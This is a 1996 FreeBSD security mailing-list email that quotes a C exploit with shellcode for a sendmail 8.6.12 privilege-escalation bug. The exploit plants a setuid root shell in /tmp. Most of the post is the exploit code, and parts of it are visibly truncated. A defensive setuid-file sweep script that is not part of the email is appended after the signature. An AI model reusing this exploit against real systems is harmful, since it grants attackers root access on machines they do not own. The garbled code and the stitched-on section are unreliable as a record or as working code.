From owner-freebsd-security Fri Sep 27 02:05:23 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id CAA22133 for security-outgoing; Fri, 27 Sep 1996 02:05:23 -0700 (PDT)
Received: from matrix.wg.camelot.de (root@matrix.wg.camelot.de [195.30.3.17]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id CAA21820 for ; Fri, 27 Sep 1996 02:04:48 -0700 (PDT)
Received: (from sec@localhost) by matrix.wg.camelot.de (8.6.12/8.6.12) id BAA24530 for security@freebsd.org; Fri, 27 Sep 1996 01:24:28 +0200
Date: Fri, 27 Sep 1996 01:24:28 +0200
From: Stefan Zehl
Message-Id: <199609262324.BAA24530@matrix.wg.camelot.de>
To: security@freebsd.org
Subject: Re: Exploit for sendmail security hole (version 8.6.12 for FreeBSD
Newsgroups: wg.lists.bugtraq
X-Newsreader: TIN [version 1.2 PL2]
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

I could not confirm the following for FreeBSD 2.1.0R while running NIS; I will try on a non-NIS machine tomorrow, but I think it might be of interest anyway :)

: /* Hi ! */
: /* This is exploit for sendmail bug (version 8.6.12 for FreeBSD 2.1.0). */
: /* If you have any problems with it, send letter to me. */
: /* Have fun ! */
: /* ----------------- Dedicated to my beautiful lady ------------------ */
: /* Leshka Zakharoff, 1996. E-mail: leshka@chci.chuvashia.su */
: #include
: main()
: {
:   void make_files();
:   make_files();
:   system("EDITOR=./hack;export EDITOR;chmod +x hack;chfn;/usr/sbin/sendmail;echo See result in /tmp");
: }
: void make_files()
: {
:   int i,j;
:   FILE *f;
:   char nop_string[200];
:   char code_string[]=
:   {
:     "\xeb\x50"                          /* jmp cont */
:     /* geteip: */ "\x5d"                /* popl %ebp */
:     "\x55"                              /* pushl %ebp */
:     "\xff\x8d\xc3\xff\xff\xff"          /* decl 0xffffffc3(%ebp) */
:     "\xff\x8d\xd7\xff\xff\xff"          /* decl 0xffffffd7(%ebp) */
:     "\xc3"                              /* ret */
:     /* 0xffffffb4(%ebp): */ "cp /bin/sh /tmp"
:     /* 0xffffffc3(%ebp): */ "\x3c"
:     "chmod a=rsx /tmp/sh"
:     /* 0xffffffd7(%ebp): */ "\x01"
:     "-leshka-leshka-leshka-leshka-"     /* reserved */
:     /* cont: */ "\xc7\xc4\x70\xcf\xbf\xef" /* movl $0xefbfcf70,%esp */
:     "\xe8\xa5\xff\xff\xff"              /* call geteip */
:     "\x81\xc5\xb4\xff\xff\xff"          /* addl $0xb4ffffff,%ebp */
:     "\x55"                              /* pushl %ebp */
:     "\x55"                              /* pushl %ebp */
:     "\x68\xd0\x77\x04\x08"              /* pushl $0x80477d0 */
:     "\xc3"                              /* ret */
:     "-leshka-leshka-leshka-leshka-"     /* reserved */
:     "\xa0\xcf\xbf\xef"
:   };
:   j=269-sizeof(code_string);
:   for(i=0;i\"$1\"\n");
:   fprintf(f,"touch -t 2510711313 \"$1\"\n");
:   fclose(f);
: }

CU, Sec
--
Every day on which you do not smile is a lost day. (C. Chaplin)
Hiroshima '45   Tsjernobyl '86   Windows '95
Black holes are where GOD is dividing by zero
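As an added defender-side check (not part of this post or of the quoted exploit): whatever the sendmail bug itself does, the quoted code's end result is a copy of /bin/sh in /tmp made setuid ("cp /bin/sh /tmp", "chmod a=rsx /tmp/sh"), so a periodic sweep of world-writable directories for setuid or setgid regular files catches that outcome however it was planted. The function names and the directory list are my own assumptions.

```shell
#!/bin/sh
# Added example: sweep directories for setuid/setgid regular files, the
# artifact the quoted exploit leaves behind (/tmp/sh with mode a=rsx).
# Function names and the /tmp, /var/tmp list are assumptions, not from the post.

# list_setuid_files DIR
# Prints, one per line, every regular file directly under DIR that has the
# setuid (4000) or setgid (2000) bit set.  -maxdepth 1 restricts it to files
# dropped straight into the directory, which is how the quoted code plants its shell.
list_setuid_files() {
    find "$1" -maxdepth 1 -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null
}

# audit_setuid_drops DIR...
# Reports each hit with its mode and owner (ls -ld), so a setuid file owned by
# root stands out from one a user set on a file of their own.
# Returns 0 when nothing was found, 1 when at least one directory had a hit.
audit_setuid_drops() {
    hits=0
    for dir in "$@"; do
        [ -d "$dir" ] || continue
        out=$(list_setuid_files "$dir")
        [ -n "$out" ] || continue
        hits=$((hits + 1))
        printf '%s\n' "$out" | while IFS= read -r f; do
            ls -ld "$f"
        done
    done
    [ "$hits" -eq 0 ]
}

# Typical use from cron, over the directories any unprivileged process can write to:
#   audit_setuid_drops /tmp /var/tmp
```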